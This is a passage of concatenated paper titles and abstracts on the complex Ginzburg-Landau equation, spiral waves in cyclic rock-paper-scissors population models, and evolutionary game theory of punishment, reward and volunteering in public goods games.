Fixed points of the flow correspond to the two basic building blocks of coherent structures, uniform amplitude states and evanescent waves whose amplitude decreases smoothly to zero. A study of the stability of the fixed points under the flow leads to results on the existence and multiplicity of the different coherent structures. The dynamical analysis of the original partial differential equation focusses on the competition between pulses and fronts, and is expressed in terms of a set of conjectures for front propagation that generalize the "marginal stability" and "pinch-point" approaches of earlier authors. These rules, together with an exact front solution whose dynamics plays an important role in the selection of patterns, yield an analytic expression for the upper limit of the range of existence of pulse solutions, as well as a determination of the regions of parameter space where uniformly translating front solutions can exist. Extensive numerical simulations show consistency with these rules and conjectures for the existence of fronts and pulses. In the parameter ranges where no uniformly translating fronts can exist, examples are shown of irregularly spreading fronts that generate strongly chaotic regions, as well as nonuniformly translating fronts that lead to uniform amplitude states. Recent perturbative treatments based on expansions about the nonlinear Schrödinger equation are generalized to perturbations of the cubic-quintic and derivative Schrödinger equations, for which both pulses and fronts exist in the unperturbed system. Comparison of the results with the exact solutions shows that the perturbation theory only yields a subset of the relevant solutions. Nevertheless, those that are obtained are found to be consistent with the general conjectures, and in particular they provide an analytic demonstration of front/pulse competition. While the discussion of the competition between fronts and pulses focusses on the complex Ginzburg-Landau equation with quintic terms and a subcritical bifurcation, a number of results are also presented for the cubic equation. In particular, the existence of a family of moving source solutions derived by Bekki and Nozaki for this equation contradicts the naive counting arguments. We attribute this contradiction to a hidden symmetry of the solution but have not been able to show explicitly how this symmetry affects the phase space orbits. --- paper_title: When does cyclic dominance lead to stable spiral waves? paper_content: Species diversity in ecosystems is often accompanied by the self-organisation of the population into fascinating spatio-temporal patterns. Here, we consider a two-dimensional three-species population model and study the spiralling patterns arising from the combined effects of generic cyclic dominance, mutation, pair-exchange and hopping of the individuals. The dynamics is characterised by nonlinear mobility and a Hopf bifurcation around which the system's phase diagram is inferred from the underlying complex Ginzburg-Landau equation derived using a perturbative multiscale expansion. While the dynamics is generally characterised by spiralling patterns, we show that spiral waves are stable in only one of the four phases.
--- paper_title: Theory of interaction and bound states of spiral waves in oscillatory media paper_content: We present an alternative method for the calculation of the interaction between spirals in oscillatory media. This method is based on a rigorous evaluation of the perturbation of an isolated spiral resulting from neighboring spirals in a linear approximation. For the complex Ginzburg-Landau equation, the existence of bound states is identified with the parameter range where the perturbations behave in an oscillatory manner. The results for the equilibrium distance for two spirals in the bound state and also the dependence of the velocity of the spiral on the distance are in good agreement with numerical simulations. In the equally charged case, we find multiple bound states which may be interpreted as multiply armed spirals. Outside the oscillatory range, well-separated spirals appear to repel each other regardless of topological charge. --- paper_title: Instability of spatial patterns and its ambiguous impact on species diversity paper_content: Self-arrangement of individuals into spatial patterns often accompanies and promotes species diversity in ecological systems. Here, we investigate pattern formation arising from cyclic dominance of three species, operating near a bifurcation point. In its vicinity, an Eckhaus instability occurs, leading to convectively unstable "blurred" patterns. At the bifurcation point, stochastic effects dominate and induce counterintuitive effects on diversity: Large patterns, emerging for medium values of individuals' mobility, lead to rapid species extinction, while small patterns (low mobility) promote diversity, and high mobilities render spatial structures irrelevant. We provide a quantitative analysis of these phenomena, employing a complex Ginzburg-Landau equation. --- paper_title: The world of the complex Ginzburg-Landau equation paper_content: The cubic complex Ginzburg-Landau equation is one of the most-studied nonlinear equations in the physics community. It describes a vast variety of phenomena from nonlinear waves to second-order phase transitions, from superconductivity, superfluidity, and Bose-Einstein condensation to liquid crystals and strings in field theory. The authors give an overview of various phenomena described by the complex Ginzburg-Landau equation in one, two, and three dimensions from the point of view of condensed-matter physicists. Their aim is to study the relevant solutions in order to gain insight into nonequilibrium phenomena in spatially extended systems. --- paper_title: Nonlinear Aspects of Competition Between Three Species paper_content: It is shown that for three competitors, the classic Gause–Lotka–Volterra equations possess a special class of periodic limit cycle solutions, and a general class of solutions in which the system exhibits nonperiodic population oscillations of bounded amplitude but ever increasing cycle time. Biologically, the result is interesting as a caricature of the complexities that nonlinearities can introduce even into the simplest equations of population biology; mathematically, the model illustrates some novel tactical tricks and dynamical peculiarities for 3-dimensional nonlinear systems. --- paper_title: Coevolutionary dynamics in structured populations of three species paper_content: Inspired by the experiments with the three strains of E.
coli bacteria as well as the three morphs of Uta stansburiana lizards, a model of cyclic dominance was proposed to investigate the mechanisms facilitating the maintenance of biodiversity in spatially structured populations. Subsequent studies enriched the original model with various biologically motivated extensions, repeating the proposed mathematical analysis and computer simulations. The research presented in this thesis unifies and generalises these models by combining the birth, selection-removal, selection-replacement and mutation processes as well as two forms of mobility into a generic metapopulation model. Instead of the standard mathematical treatment, more controlled analysis with inverse system size and multiscale asymptotic expansions is presented to derive an approximation of the system dynamics in terms of a well-known pattern forming equation. The novel analysis, capable of increased accuracy, is evaluated with improved numerical experiments performed with bespoke software developed for simulating the stochastic and deterministic descriptions of the generic metapopulation model. The emergence of spiral waves facilitating the long term biodiversity is confirmed in the computer simulations as predicted by the theory. The derived conditions on the stability of spiral patterns for different values of the biological parameters are studied, resulting in discoveries of interesting phenomena such as spiral annihilation or instabilities caused by nonlinear diffusive terms. --- paper_title: A non-linear instability theory for a wave system in plane Poiseuille flow paper_content: The initial-value problem for linearized perturbations is discussed, and the asymptotic solution for large time is given. For values of the Reynolds number slightly greater than the critical value, above which perturbations may grow, the asymptotic solution is used as a guide in the choice of appropriate length and time scales for slow variations in the amplitude A of a non-linear two-dimensional perturbation wave. It is found that suitable time and space variables are εt and ε^{1/2}(x + a_{1r} t), where t is the time, x the distance in the direction of flow, ε the growth rate of linearized theory and (−a_{1r}) the group velocity. By the method of multiple scales, A is found to satisfy a non-linear parabolic differential equation, a generalization of the time-dependent equation of earlier work. Initial conditions are given by the asymptotic solution of linearized theory.
Because of this the problem can be reduced to the study of a single non-linear partial differential equation for a special Fourier transform of the modal amplitudes. It is a striking feature of the present work that the study of a wide class of problems reduces to the study of this single fundamental equation which does not essentially depend on the specific forms of the operators in the original system of governing equations. Certain general conclusions are drawn from this equation, for example for some problems there exist multi-modal steady solutions which are a combination of a number of modes with different spatial periods. (Whether any such solutions are stable remains an open question.) It is also shown in other circumstances that there are solutions (at least for some interval of time) which are non-linear travelling waves whose kinematic behaviour can be clarified by the concept of group speed. --- paper_title: Global attractors and extinction dynamics of cyclically competing species paper_content: Transitions to absorbing states are of fundamental importance in nonequilibrium physics as well as ecology. In ecology, absorbing states correspond to the extinction of species. We here study the spatial population dynamics of three cyclically interacting species. The interaction scheme comprises both direct competition between species as in the cyclic Lotka-Volterra model, and separated selection and reproduction processes as in the May-Leonard model. We show that the dynamic processes leading to the transient maintenance of biodiversity are closely linked to attractors of the nonlinear dynamics for the overall species' concentrations. The characteristics of these global attractors change qualitatively at certain threshold values of the mobility and depend on the relative strength of the different types of competition between species. They give information about the scaling of extinction times with the system size and thereby the stability of biodiversity. We define an effective free energy as the negative logarithm of the probability to find the system in a specific global state before reaching one of the absorbing states. The global attractors then correspond to minima of this effective energy landscape and determine the most probable values for the species' global concentrations. As in equilibrium thermodynamics, qualitative changes in the effective free energy landscape indicate and characterize the underlying nonequilibrium phase transitions. We provide the complete phase diagrams for the population dynamics and give a comprehensive analysis of the spatio-temporal dynamics and routes to extinction in the respective phases. --- paper_title: Self-Organization of Mobile Populations in Cyclic Competition paper_content: The formation of out-of-equilibrium patterns is a characteristic feature of spatially extended, biodiverse, ecological systems. Intriguing examples are provided by cyclic competition of species, as metaphorically described by the 'rock-paper-scissors' game. Both experimentally and theoretically, such non-transitive interactions have been found to induce self-organization of static individuals into noisy, irregular clusters. However, a profound understanding and characterization of such patterns is still lacking. Here, we theoretically investigate the influence of individuals' mobility on the spatial structures emerging in rock-paper-scissors games.
We devise a quantitative approach to analyze the spatial patterns self-forming in the course of the stochastic time evolution. For a paradigmatic model originally introduced by May and Leonard, within an interacting particle approach, we demonstrate that the system's behavior, in the proper continuum limit, is aptly captured by a set of stochastic partial differential equations. The system's stochastic dynamics is shown to lead to the emergence of entangled rotating spiral waves. While the spirals' wavelength and spreading velocity is demonstrated to be accurately predicted by a (deterministic) complex Ginzburg-Landau equation, their entanglement results from the inherent stochastic nature of the system. These findings and our methods have important applications for understanding the formation of noisy patterns, e.g. in ecological and evolutionary contexts, and are also of relevance for the kinetics of (bio)-chemical reactions. --- paper_title: Mutual Feedbacks Maintain Both Genetic and Species Diversity in a Plant Community paper_content: The forces that maintain genetic diversity among individuals and diversity among species are usually studied separately. Nevertheless, diversity at one of these levels may depend on the diversity at the other. We have combined observations of natural populations, quantitative genetics, and field experiments to show that genetic variation in the concentration of an allelopathic secondary compound in Brassica nigra is necessary for the coexistence of B. nigra and its competitor species. In addition, the diversity of competing species was required for the maintenance of genetic variation in the trait within B. nigra. Thus, conservation of species diversity may also necessitate maintenance of the processes that sustain the genetic diversity of each individual species. --- paper_title: Noise and Correlations in a Spatial Population Model with Cyclic Competition paper_content: Noise and spatial degrees of freedom characterize most ecosystems. Some aspects of their influence on the coevolution of populations with cyclic interspecies competition have been demonstrated in recent experiments [e.g., B. Kerr et al., Nature (London) 418, 171 (2002)]. To reach a better theoretical understanding of these phenomena, we consider a paradigmatic spatial model where three species exhibit cyclic dominance. Using an individual-based description, as well as stochastic partial differential and deterministic reaction-diffusion equations, we account for stochastic fluctuations and spatial diffusion at different levels and show how fascinating patterns of entangled spirals emerge. We rationalize our analysis by computing the spatiotemporal correlation functions and provide analytical expressions for the front velocity and the wavelength of the propagating spiral waves. --- paper_title: A time dependent Ginzburg-Landau equation and its application to the problem of resistivity in the mixed state paper_content: A time dependent modification of the Ginzburg-Landau equation is given which is based on the assumption that the functional derivative of the Ginzburg-Landau free energy expression with respect to the wave function is a generalized force in the sense of irreversible thermodynamics acting on the wave function. This equation implies an energy theorem, according to which the energy can be dissipated by i) production of Joule heat; ii) irreversible variation of the wave function. The theory is a limiting case of the BCS theory, and hence, it contains no adjustable parameters.
The application of the modified equation to the problem of resistivity in the mixed state reveals satisfactory agreement between experiment and theory for reduced temperatures higher than 0.6. --- paper_title: Characterization of spiraling patterns in spatial rock-paper-scissors games paper_content: The spatiotemporal arrangement of interacting populations often influences the maintenance of species diversity and is a subject of intense research. Here, we study the spatiotemporal patterns arising from the cyclic competition between three species in two dimensions. Inspired by recent experiments, we consider a generic metapopulation model comprising “rock-paper-scissors” interactions via dominance removal and replacement, reproduction, mutations, pair exchange, and hopping of individuals. By combining analytical and numerical methods, we obtain the model's phase diagram near its Hopf bifurcation and quantitatively characterize the properties of the spiraling patterns arising in each phase. The phases characterizing the cyclic competition away from the Hopf bifurcation (at low mutation rate) are also investigated. Our analytical approach relies on the careful analysis of the properties of the complex Ginzburg-Landau equation derived through a controlled (perturbative) multiscale expansion around the model's Hopf bifurcation. Our results allow us to clarify when spatial “rock-paper-scissors” competition leads to stable spiral waves and under which circumstances they are influenced by nonlinear mobility. --- paper_title: Evolutionary Games and Population Dynamics paper_content: Every form of behavior is shaped by trial and error. Such stepwise adaptation can occur through individual learning or through natural selection, the basis of evolution. Since the work of Maynard Smith and others, it has been realized how game theory can model this process. Evolutionary game theory replaces the static solutions of classical game theory by a dynamical approach centered not on the concept of rational players but on the population dynamics of behavioral programs. In this book the authors investigate the nonlinear dynamics of the self-regulation of social and economic behavior, and of the closely related interactions among species in ecological communities. Replicator equations describe how successful strategies spread and thereby create new conditions that can alter the basis of their success, i.e., to enable us to understand the strategic and genetic foundations of the endless chronicle of invasions and extinctions that punctuate evolution. In short, evolutionary game theory describes when to escalate a conflict, how to elicit cooperation, why to expect a balance of the sexes, and how to understand natural selection in mathematical terms. The book offers a comprehensive treatment of ecological and game theoretic dynamics; invasion dynamics and permanence as key concepts; and explanation in terms of games of things like competition between species. --- paper_title: Evolutionary Game Theory: Theoretical Concepts and Applications to Microbial Communities paper_content: Ecological systems are complex assemblies of large numbers of individuals, interacting competitively under multifaceted environmental conditions. Recent studies using microbial laboratory communities have revealed some of the self-organization principles underneath the complexity of these systems.
A major role of the inherent stochasticity of its dynamics and the spatial segregation of different interacting species into distinct patterns has thereby been established. It ensures the viability of microbial colonies by allowing for species diversity, cooperative behavior and other kinds of “social” behavior. A synthesis of evolutionary game theory, nonlinear dynamics, and the theory of stochastic processes provides the mathematical tools and a conceptual framework for a deeper understanding of these ecological systems. We give an introduction into the modern formulation of these theories and illustrate their effectiveness focussing on selected examples of microbial systems. Intrinsic fluctuations, stemming from the discreteness of individuals, are ubiquitous, and can have an important impact on the stability of ecosystems. In the absence of speciation, extinction of species is unavoidable. It may, however, take very long times. We provide a general concept for defining survival and extinction on ecological time-scales. Spatial degrees of freedom come with a certain mobility of individuals. When the latter is sufficiently high, bacterial community structures can be understood through mapping individual-based models, in a continuum approach, onto stochastic partial differential equations. These allow progress using methods of nonlinear dynamics such as bifurcation analysis and invariant manifolds. We conclude with a perspective on the current challenges in quantifying bacterial pattern formation, and how this might have an impact on fundamental research in non-equilibrium physics. --- paper_title: Correlation of positive and negative reciprocity fails to confer an evolutionary advantage: Phase transitions to elementary strategies paper_content: Economic experiments reveal that humans value cooperation and fairness. Punishing unfair behavior is therefore common, and according to the theory of strong reciprocity, it is also directly related to rewarding cooperative behavior. However, empirical data fail to confirm that positive and negative reciprocity are correlated. Inspired by this disagreement, we determine whether the combined application of reward and punishment is evolutionarily advantageous. We study a spatial public goods game, where in addition to the three elementary strategies of defection, rewarding and punishment, a fourth strategy combining the latter two competes for space. We find rich dynamical behavior that gives rise to intricate phase diagrams where continuous and discontinuous phase transitions occur in succession. Indirect territorial competition, spontaneous emergence of cyclic dominance, as well as divergent fluctuations of oscillations that terminate in an absorbing phase are observed. Yet despite the high complexity of solutions, the combined strategy can survive only in very narrow and unrealistic parameter regions. Elementary strategies, either in pure or mixed phases, are much more common and likely to prevail. Our results highlight the importance of patterns and structure in human cooperation, which should be considered in future experiments. --- paper_title: Punishing and abstaining for public goods. paper_content: The evolution of cooperation within sizable groups of nonrelated humans offers many challenges for our understanding. Current research has highlighted two factors boosting cooperation in public goods interactions, namely, costly punishment of defectors and the option to abstain from the joint enterprise.
A recent modeling approach has suggested that the autarkic option acts as a catalyzer for the ultimate fixation of altruistic punishment. We present an alternative, more microeconomically based model that yields a bistable outcome instead. Evolutionary dynamics can lead either to a Nash equilibrium of punishing and nonpunishing cooperators or to an oscillating state without punishers. --- paper_title: Self-organization of punishment in structured populations paper_content: Cooperation is crucial for the remarkable evolutionary success of the human species. Not surprisingly, some individuals are willing to bear additional costs in order to punish defectors. Current models assume that, once set, the fine and cost of punishment do not change over time. Here we show that relaxing this assumption by allowing players to adapt their sanctioning efforts in dependence on the success of cooperation can explain both the spontaneous emergence of punishment and its ability to deter defectors and those unwilling to punish them with globally negligible investments. By means of phase diagrams and the analysis of emerging spatial patterns, we demonstrate that adaptive punishment promotes public cooperation through the invigoration of spatial reciprocity, the prevention of the emergence of cyclic dominance, or the provision of competitive advantages to those that sanction antisocial behavior. The results presented indicate that the process of self-organization significantly elevates the effectiveness of punishment, and they reveal new mechanisms by means of which this fascinating and widespread social behavior could have evolved. --- paper_title: Evolutionary dynamics of group interactions on structured populations: A review paper_content: Interactions among living organisms, from bacteria colonies to human societies, are inherently more complex than interactions among particles and non-living matter. Group interactions are a particularly important and widespread class, representative of which is the public goods game. In addition, methods of statistical physics have proved valuable for studying pattern formation, equilibrium selection and self-organization in evolutionary games. Here, we review recent advances in the study of evolutionary dynamics of group interactions on top of structured populations, including lattices, complex networks and coevolutionary models. We also compare these results with those obtained on well-mixed populations. The review particularly highlights that the study of the dynamics of group interactions, like several other important equilibrium and non-equilibrium dynamical processes in biological, economical and social sciences, benefits from the synergy between statistical physics, network science and evolutionary game theory. --- paper_title: Phase diagrams for three-strategy evolutionary prisoner's dilemma games on regular graphs paper_content: Evolutionary prisoner's dilemma games are studied with players located on square lattice and random regular graph defining four neighbors for each one. The players follow one of the three strategies: tit-for-tat, unconditional cooperation, and defection. The simplified payoff matrix is characterized by two parameters: the temptation b to choose defection and the cost c of inspection reducing the income of tit-for-tat. The strategy imitation from one of the neighbors is controlled by pairwise comparison at a fixed level of noise. 
Using Monte Carlo simulations and the extended versions of pair approximation we have evaluated the b-c phase diagrams indicating a rich plethora of phase transitions between stationary coexistence, absorbing, and oscillatory states, including continuous and discontinuous phase transitions. For reasonable costs, the tit-for-tat strategy prevents extinction of cooperators across the whole span of b determining the prisoner's dilemma game, irrespective of the connectivity structure. We also demonstrate that the system can exhibit a repetitive succession of oscillatory and stationary states upon changing a single payoff value, which highlights the remarkable sensitivity of cyclical interactions to the parameters that define the strength of dominance. --- paper_title: Incentives and opportunism: from the carrot to the stick paper_content: Cooperation in public good games is greatly promoted by positive and negative incentives. In this paper, we use evolutionary game dynamics to study the evolution of opportunism (the readiness to be swayed by incentives) and the evolution of trust (the propensity to cooperate in the absence of information on the co-players). If both positive and negative incentives are available, evolution leads to a population where defectors are punished and players cooperate, except when they can get away with defection. Rewarding behaviour does not become fixed, but can play an essential role in catalysing the emergence of cooperation, especially if the information level is low. --- paper_title: The evolution of sanctioning institutions: an experimental approach to the social contract paper_content: A vast amount of empirical and theoretical research on public good games indicates that the threat of punishment can curb free-riding in human groups engaged in joint enterprises. Since punishment is often costly, however, this raises an issue of second-order free-riding: indeed, the sanctioning system itself is a common good which can be exploited. Most investigations, so far, considered peer punishment: players could impose fines on those who exploited them, at a cost to themselves. Only a minority considered so-called pool punishment. In this scenario, players contribute to a punishment pool before engaging in the joint enterprise, and without knowing who the free-riders will be. Theoretical investigations (Sigmund et al., Nature 466:861–863, 2010) have shown that peer punishment is more efficient, but pool punishment more stable. Social learning, i.e., the preferential imitation of successful strategies, should lead to pool punishment if sanctions are also imposed on second-order free-riders, but to peer punishment if they are not. Here we describe an economic experiment (the Mutual Aid game) which tests this prediction. We find that pool punishment only emerges if second-order free riders are punished, but that peer punishment is more stable than expected. Basically, our experiment shows that social learning can lead to a spontaneously emerging social contract, based on a sanctioning institution to overcome the free rider problem. --- paper_title: Volunteering leads to rock–paper–scissors dynamics in a public goods game paper_content: Collective efforts are a trademark of both insect and human societies [1]. They are achieved through relatedness in the former [2] and unknown mechanisms in the latter. The problem of achieving cooperation among non-kin has been described as the ‘tragedy of the commons’, prophesying the inescapable collapse of many human enterprises [3,4].
In public goods experiments, initial cooperation usually drops quickly to almost zero [5]. It can be maintained by the opportunity to punish defectors [6] or the need to maintain good reputation [7]. Both schemes require that defectors are identified. Theorists propose that a simple but effective mechanism operates under full anonymity. With optional participation in the public goods game, ‘loners’ (players who do not join the group), defectors and cooperators will coexist through rock–paper–scissors dynamics [8,9]. Here we show experimentally that volunteering generates these dynamics in public goods games and that manipulating initial conditions can produce each predicted direction. If, by manipulating displayed decisions, it is pretended that defectors have the highest frequency, loners soon become most frequent, as do cooperators after loners and defectors after cooperators. On average, cooperation is perpetuated at a substantial level. --- paper_title: Effects of punishment in a mobile population playing the prisoner's dilemma game paper_content: We deal with a system of prisoner's dilemma players undergoing continuous motion in a two-dimensional plane. In contrast to previous work, we introduce altruistic punishment after the game. We find punishing only a few of the cooperator-defector interactions is enough to lead the system to a cooperative state in environments where otherwise defection would take over the population. This happens even with soft nonsocial punishment (where both cooperators and defectors punish other players, a behavior observed in many human populations). For high enough mobilities or temptations to defect, low rates of social punishment can no longer avoid the breakdown of cooperation. --- paper_title: Evolutionary advantages of adaptive rewarding paper_content: Our well-being depends on both our personal success and the success of our society. The realization of this fact makes cooperation an essential trait. Experiments have shown that rewards can elevate our readiness to cooperate, but since giving a reward inevitably entails paying a cost for it, the emergence and stability of such behavior remains elusive. Here we show that allowing for the act of rewarding to self-organize in dependence on the success of cooperation creates several evolutionary advantages that instill new ways through which collaborative efforts are promoted. Ranging from indirect territorial battle to the spontaneous emergence and destruction of coexistence, phase diagrams and the underlying spatial patterns reveal fascinatingly rich social dynamics that explain why this costly behavior has evolved and persevered. Comparisons with adaptive punishment, however, uncover an Achilles heel of adaptive rewarding, coming from over-aggression, which in turn hinders optimal utilization of network reciprocity. This may explain why, despite its success, rewarding is not as firmly embedded into our societal organization as punishment. --- paper_title: Dynamically generated cyclic dominance in spatial prisoner's dilemma games paper_content: We have studied the impact of time-dependent learning capacities of players in the framework of spatial prisoner's dilemma game. In our model, this capacity of players may decrease or increase in time after strategy adoption according to a step-like function. We investigated both possibilities separately and observed significantly different mechanisms that form the stationary pattern of the system.
The time-decreasing learning activity helps cooperator domains to recover from possible intrusions of defectors and hence supports cooperation. In the other case, the temporarily restrained learning activity generates a cyclic dominance between defector and cooperator strategies, which helps to maintain the diversity of strategies via propagating waves. The results are robust and remain valid by changing payoff values, interaction graphs or functions characterizing time-dependence of learning activity. Our observations suggest that dynamically generated mechanisms may offer alternative ways to keep cooperators alive even at very large temptations to defect. --- paper_title: Reward and cooperation in the spatial public goods game paper_content: The promise of punishment and reward in promoting public cooperation is debatable. While punishment is traditionally considered more successful than reward, the fact that the cost of punishment frequently fails to offset gains from enhanced cooperation has led some to reconsider reward as the main catalyst behind collaborative efforts. Here we elaborate on the "stick versus carrot" dilemma by studying the evolution of cooperation in the spatial public goods game, where besides the traditional cooperators and defectors, rewarding cooperators supplement the array of possible strategies. The latter are willing to reward cooperative actions at a personal cost, thus effectively downgrading pure cooperators to second-order free-riders due to their unwillingness to bear these additional costs. Consequently, we find that defection remains viable, especially if the rewarding is costly. Rewards, however, can promote cooperation, especially if the synergetic effects of cooperation are low. Surprisingly, moderate rewards may promote cooperation better than high rewards, which is due to the spontaneous emergence of cyclic dominance between the three strategies. --- paper_title: Evolutionary establishment of moral and double moral standards through spatial interactions paper_content: Situations where individuals have to contribute to joint efforts or share scarce resources are ubiquitous. Yet, without proper mechanisms to ensure cooperation, the evolutionary pressure to maximize individual success tends to create a tragedy of the commons (such as over-fishing or the destruction of our environment). This contribution addresses a number of related puzzles of human behavior with an evolutionary game theoretical approach as it has been successfully used to explain the behavior of other biological species many times, from bacteria to vertebrates. Our agent-based model distinguishes individuals applying four different behavioral strategies: non-cooperative individuals ("defectors"), cooperative individuals abstaining from punishment efforts (called "cooperators" or "second-order free-riders"), cooperators who punish non-cooperative behavior ("moralists"), and defectors, who punish other defectors despite being non-cooperative themselves ("immoralists"). By considering spatial interactions with neighboring individuals, our model reveals several interesting effects: First, moralists can fully eliminate cooperators. This spreading of punishing behavior requires a segregation of behavioral strategies and solves the "second-order free-rider problem". Second, the system behavior changes its character significantly even after very long times ("who laughs last laughs best effect").
Third, the presence of a number of defectors can largely accelerate the victory of moralists over non-punishing cooperators. Fourth, in order to succeed, moralists may profit from immoralists in a way that appears like an "unholy collaboration". Our findings suggest that the consideration of punishment strategies allows one to understand the establishment and spreading of "moral behavior" by means of game-theoretical concepts. This demonstrates that quantitative biological modeling approaches are powerful even in domains that have been addressed with non-mathematical concepts so far. The complex dynamics of certain social behaviors become understandable as the result of an evolutionary competition between different behavioral strategies. --- paper_title: Indirect reciprocity can stabilize cooperation without the second-order free rider problem paper_content: Models of large-scale human cooperation take two forms. ‘Indirect reciprocity’ [1] occurs when individuals help others in order to uphold a reputation and so be included in future cooperation. In ‘collective action’ [2], individuals engage in costly behaviour that benefits the group as a whole. Although the evolution of indirect reciprocity is theoretically plausible [3,4,5,6], there is no consensus about how collective action evolves. Evidence suggests that punishing free riders can maintain cooperation [7,8,9], but why individuals should engage in costly punishment is unclear. Solutions to this ‘second-order free rider problem’ include meta-punishment [10], mutation [11], conformism [12], signalling [13,14,15] and group-selection [16,17,18]. The threat of exclusion from indirect reciprocity can sustain collective action in the laboratory [19]. Here, we show that such exclusion is evolutionarily stable, providing an incentive to engage in costly cooperation, while avoiding the second-order free rider problem because punishers can withhold help from free riders without damaging their reputations. However, we also show that such a strategy cannot invade a population in which indirect reciprocity is not linked to collective action, thus leaving unexplained how collective action arises. --- paper_title: The evolution of altruistic punishment paper_content: Both laboratory and field data suggest that people punish noncooperators even in one-shot interactions. Although such “altruistic punishment” may explain the high levels of cooperation in human societies, it creates an evolutionary puzzle: existing models suggest that altruistic cooperation among nonrelatives is evolutionarily stable only in small groups. Thus, applying such models to the evolution of altruistic punishment leads to the prediction that people will not incur costs to punish others to provide benefits to large groups of nonrelatives. However, here we show that an important asymmetry between altruistic cooperation and altruistic punishment allows altruistic punishment to evolve in populations engaged in one-time, anonymous interactions. This process allows both altruistic punishment and altruistic cooperation to be maintained even when groups are large and other parameter values approximate conditions that characterize cultural evolution in the small-scale societies in which humans lived for most of our prehistory. --- paper_title: Reward and punishment paper_content: Minigames capturing the essence of Public Goods experiments show that even in the absence of rationality assumptions, both punishment and reward will fail to bring about prosocial behavior.
This result holds in particular for the well-known Ultimatum Game, which emerges as a special case. But reputation can induce fairness and cooperation in populations adapting through learning or imitation. Indeed, the inclusion of reputation effects in the corresponding dynamical models leads to the evolution of economically productive behavior, with agents contributing to the public good and either punishing those who do not or rewarding those who do. Reward and punishment correspond to two types of bifurcation with intriguing complementarity. The analysis suggests that reputation is essential for fostering social behavior among selfish agents, and that it is considerably more effective with punishment than with reward. --- paper_title: Phase diagrams for the spatial public goods game with pool-punishment paper_content: The efficiency of institutionalized punishment is studied by evaluating the stationary states in the spatial public goods game comprising unconditional defectors, cooperators, and cooperating pool punishers as the three competing strategies. Fines and costs of pool punishment are considered as the two main parameters determining the stationary distributions of strategies on the square lattice. Each player collects a payoff from five five-person public goods games, and the evolution of strategies is subsequently governed by imitation based on pairwise comparisons at a low level of noise. The impact of pool punishment on the evolution of cooperation in structured populations is significantly different from that reported previously for peer punishment. Representative phase diagrams reveal remarkably rich behavior, depending also on the value of the synergy factor that characterizes the efficiency of investments paid into the common pool. Besides traditional single- and two-strategy stationary states, a rock-paper-scissors type of cyclic dominance can emerge in strikingly different ways. --- paper_title: Rare but severe concerted punishment that favors cooperation. paper_content: As one of the mechanisms that are supposed to explain the evolution of cooperation among unrelated individuals, costly punishment, in which altruistic individuals privately bear the cost to punish defection, suffers from such drawbacks as decreasing individuals' welfare, inducing second-order free riding, the difficulty of catching defection, and the possibility of triggering retaliation. To improve this promising mechanism, here we propose an extended Public Goods game with rare but severe concerted punishment, in which once a defector is caught punishment is triggered and the cost of punishment is equally shared among the remainder of the group. Analytical results show that, when the probability for concerted punishment is above a threshold, cooperating is, while defecting is not, an evolutionarily stable strategy in finite populations, and that this way of punishment can considerably decrease the total cost of inhibiting defection, especially in large populations. --- paper_title: Public goods games with reward in finite populations paper_content: Public goods games paraphrase the problem of cooperation in game theoretical terms. Cooperators contribute to a public good and thereby increase the welfare of others at a cost to themselves. Defectors consume the public good but do not pay its cost and therefore outperform cooperators.
Hence, according to genetic or cultural evolution, defectors should be favored and the public good disappear – despite the fact that groups of cooperators are better off than groups of defectors. The maximization of short term individual profits causes the demise of the common resource to the detriment of all. This outcome can be averted by introducing incentives to cooperate. Negative incentives based on the punishment of defectors efficiently stabilize cooperation once established but cannot initiate cooperation. Here we consider the complementary case of positive incentives created by allowing individuals to reward those that contribute to the public good. The finite-population stochastic dynamics of the public goods game with reward demonstrate that reward initiates cooperation by providing an escape hatch out of states of mutual defection. However, in contrast to punishment, reward is unable to stabilize cooperation but, instead, gives rise to a persistent minority of cooperators. --- paper_title: Cooperation for volunteering and partially random partnerships paper_content: Competition among cooperative, defective, and loner strategies is studied by considering an evolutionary prisoner's dilemma game for different partnerships. In this game each player can adopt one of its coplayer's strategy with a probability depending on the difference of payoffs coming from games with the corresponding coplayers. Our attention is focused on the effects of annealed and quenched randomness in the partnership for fixed number of coplayers. It is shown that only the loners survive if the four coplayers are chosen randomly (mean-field limit). On the contrary, on the square lattice all the three strategies are maintained by the cyclic invasions resulting in a self-organizing spatial pattern. If the fixed partnership is described by a regular small-world structure then a homogeneous oscillation occurs in the population dynamics when the measure of quenched randomness exceeds a threshold value. Similar behavior with higher sensitivity to the randomness is found if temporary partners are substituted for the standard ones with some probability at each step of iteration. --- paper_title: Emergence of synchronization induced by the interplay between two prisoner's dilemma games with volunteering in small-world networks paper_content: We studied synchronization between prisoner's dilemma games with voluntary participation in two Newman-Watts small-world networks. It was found that there are three kinds of synchronization: partial phase synchronization, total phase synchronization, and complete synchronization, for varied coupling factors. Besides, two games can reach complete synchronization for the large enough coupling factor. We also discussed the effect of the coupling factor on the amplitude of oscillation of cooperator density. --- paper_title: Defense mechanisms of empathetic players in the spatial ultimatum game paper_content: Experiments on the ultimatum game have revealed that humans are remarkably fond of fair play. When asked to share an amount of money, unfair offers are rare and their acceptance rate small. While empathy and spatiality may lead to the evolution of fairness, thus far considered continuous strategies have precluded the observation of solutions that would be driven by pattern formation. Here we introduce a spatial ultimatum game with discrete strategies, and we show that this simple alteration opens the gate to fascinatingly rich dynamical behavior. 
In addition to mixed stationary states, we report the occurrence of traveling waves and cyclic dominance, where one strategy in the cycle can be an alliance of two strategies. The highly webbed phase diagram, entailing continuous and discontinuous phase transitions, reveals hidden complexity in the pursuit of human fair play. --- paper_title: Phase transitions and volunteering in spatial public goods games. paper_content: We present a simple yet effective mechanism promoting cooperation under full anonymity by allowing for voluntary participation in public goods games. This natural extension leads to "rock-scissors-paper"-type cyclic dominance of the three strategies, cooperate, defect, and loner. In spatial settings with players arranged on a regular lattice, this results in interesting dynamical properties and intriguing spatiotemporal patterns. In particular, variations of the value of the public good leads to transitions between one-, two-, and three-strategy states which either are in the class of directed percolation or show interesting analogies to Ising-type models. Although volunteering is incapable of stabilizing cooperation, it efficiently prevents successful spreading of selfish behavior. --- paper_title: Moral assessment in indirect reciprocity paper_content: Indirect reciprocity is one of the mechanisms for cooperation, and seems to be of particular interest for the evolution of human societies. A large part is based on assessing reputations and acting accordingly. This paper gives a brief overview of different assessment rules for indirect reciprocity, and studies them by using evolutionary game dynamics. Even the simplest binary assessment rules lead to complex outcomes and require considerable cognitive abilities. --- paper_title: The take-it-or-leave-it option allows small penalties to overcome social dilemmas paper_content: Self-interest frequently causes individuals engaged in joint enterprises to choose actions that are counterproductive. 